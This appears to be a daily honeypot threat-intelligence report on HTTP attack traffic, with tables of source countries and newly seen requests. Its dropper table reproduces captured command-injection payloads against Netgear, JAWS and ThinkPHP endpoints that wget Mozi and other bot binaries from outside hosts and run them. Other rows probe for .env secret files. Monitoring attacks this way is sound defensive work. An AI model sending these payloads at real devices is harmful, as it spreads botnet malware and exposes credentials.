
Report: 2025-03-29

Author
Shoggoth Industries

Daily Report: 2025-03-29

Interaction report on the HTTP services of various honeypots around the world.

ot_simplified_report

Simplified report for medium-level interactions with honeypots that mimic industrial systems (website loading, or interactions with the website). For more information, contact us at social@shoggoth.industries.

| source_country | targeted_country |
| --- | --- |
| CN | Georgia |
| MY | |
| LV | |

botnet_dropper_behaviour

List of requests suspected of having stage 1 dropper behavior (programs designed to extract other files from their own code).

| remote_addr | request |
| --- | --- |
| 42.227.166.156 | GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://42.227.166.156:52343/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0 |
| 103.207.124.231 | GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0 |
| 178.72.78.8 | GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1 |
| 120.85.117.186 | GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0 |
| 31.170.22.205 | GET /cgi-bin/live_api.cgi?page=satellite_list&id=&ip=$(cd+/tmp;wget+http://31.170.22.205/dl18;curl+-O+http://31.170.22.205/dl18;sh+dl18) HTTP/1.1 |
| 141.98.11.210 | POST /device.rsp?opt=sys&cmd=S_O_S_T_R_E_A_MAX&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20-rf%20parm7%3B%20wget%20http%3A%2F%2F193.32.162.27%2Fbins%2Fparm7%3B%20chmod%20777%20parm7%3B%20.%2Fparm7%20sex HTTP/1.1 |
| 118.40.165.223 | GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=‘wget http://185.225.75.8/bins/vcimanagement.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp’ HTTP/1.1 |
| 31.170.22.205 | GET /cgi-bin/live_api.cgi?page=satellite_list&id=&ip=$(cd+/var/tmp;wget+http://31.170.22.205/dl18;curl+-O+http://31.170.22.205/dl18;sh+dl18) HTTP/1.1 |
| 180.153.27.22 | GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://5.255.115.56/x86_64 -O /tmp/.phpdsds; chmod 777 /tmp/.phpdsds; /tmp/.phpdsds php.x86’ HTTP/1.1 |
| 58.242.106.187 | GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://5.255.115.56/x86_64 -O /tmp/.phpdsds; chmod 777 /tmp/.phpdsds; /tmp/.phpdsds php.x86’ HTTP/1.1 |
| 182.84.138.116 | 27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0 |
| 88.247.162.58 | GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘rm -rf bejv86; wget http://176.65.134.201/bejv86 -O /tmp/.Aqua; chmod 777 /tmp/.Aqua; /tmp/.Aqua thinkphp.selfrep’ HTTP/1.1 |
| 185.233.117.25 | GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=‘wget http://152.42.234.215/bns/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp’ HTTP/1.1 |

request

List of the day's requests that had never been detected before; other requests have already been detected and archived in the request database.

| | number_of_occurence | request |
| --- | --- | --- |
| 225 | 4 | GET /dependencies/.env HTTP/1.1 |
| 239 | 3 | CONNECT pro.ip-api.com:443 HTTP/1.1 |
| 240 | 3 | \x04\x01\x01\xBB\x00\x00\x00\x01proxychecker\x00pro.ip-api.com\x00 |
| 267 | 2 | GET /robots/.env HTTP/1.1 |
| 270 | 2 | GET /~admin/.env HTTP/1.1 |
| 292 | 2 | GET /upload/.env HTTP/1.1 |
| 294 | 2 | GET /html/.env HTTP/1.1 |
| 295 | 2 | GET /v1 HTTP/1.1 |
| 353 | 1 | GET /Laravel/.env HTTP/1.1 |
| 357 | 1 | GET /.config.yaml HTTP/1.1 |
| 359 | 1 | GET /data/.env HTTP/1.1 |
| 361 | 1 | GET /inc/.env HTTP/1.1 |
| 362 | 1 | GET /misc/.env HTTP/1.1 |
| 369 | 1 | \x04\x01\x01\xBB@\xE9\xA2\x93adm:12345\x00 |
| 383 | 1 | GET /Api/.env HTTP/1.1 |
| 384 | 1 | GET /doc/.env HTTP/1.1 |
| 400 | 1 | \x04\x01\x01\xBB@\xE9\xA2i\x00 |
| 595 | 1 | GET /VERM/VERM_AJAX_functions.php?function=log_custom_report&TPFME=BK0NI HTTP/1.1 |
| 596 | 1 | GET /VERM/VERM_AJAX_functions.php?function=log_custom_report&J6EHU=ORME4 HTTP/1.1 |
| 597 | 1 | GET /VERM/VERM_AJAX_functions.php?function=log_custom_report&WAL7Z=NBHQW HTTP/1.1 |
| 598 | 1 | GET /VERM/VERM_AJAX_functions.php?function=log_custom_report&UM446=FADMG HTTP/1.1 |
| 599 | 1 | GET /VERM/VERM_AJAX_functions.php?function=log_custom_report&6K4U8=807YZ HTTP/1.1 |
| 629 | 1 | GET /vicidial/welcome.php HTTP/1.1 |
| 665 | 1 | GET /VERM/VERM_AJAX_functions.php?function=log_custom_report&5XVSK=28GHM HTTP/1.1 |

country_iso_code

List of countries (by ISO code) and the number of requests received from IPs located in these countries.

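| | number_of_occurence | country_iso_code |
| --- | --- | --- |
| 0 | 1035 | NL |
| 1 | 395 | US |
| 2 | 382 | BG |
| 3 | 323 | GB |
| 4 | 174 | CN |
| 5 | 168 | MY |
| 6 | 104 | SC |
| 7 | 83 | HK |
| 8 | 65 | PL |
| 9 | 63 | IN |
| 10 | 55 | CH |
| 11 | 53 | KR |
| 12 | 52 | BE |
| 13 | 51 | SG |
| 14 | 47 | VN |
| 15 | 25 | LV |
| 16 | 21 | UA |
| 17 | 20 | DE |
| 18 | 20 | LT |
| 19 | 13 | RO |
| 20 | 12 | FR |
| 21 | 11 | PT |
| 22 | 11 | NG |
| 23 | 11 | GH |
| 24 | 9 | CA |
| 25 | 8 | JP |
| 26 | 6 | BR |
| 27 | 6 | ID |
| 28 | 6 | IR |
| 29 | 5 | TR |
| 30 | 4 | RU |
| 31 | 2 | CZ |
| 32 | 2 | AZ |
| 33 | 2 | AO |
| 34 | 2 | ZA |
| 35 | 1 | MC |
| 36 | 1 | BD |
| 37 | 1 | AR |
| 38 | 1 | ES |
| 39 | 1 | TH |
| 40 | 1 | RW |
| 41 | 1 | GE |
| 42 | 1 | IT |
| 43 | 1 | AE |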
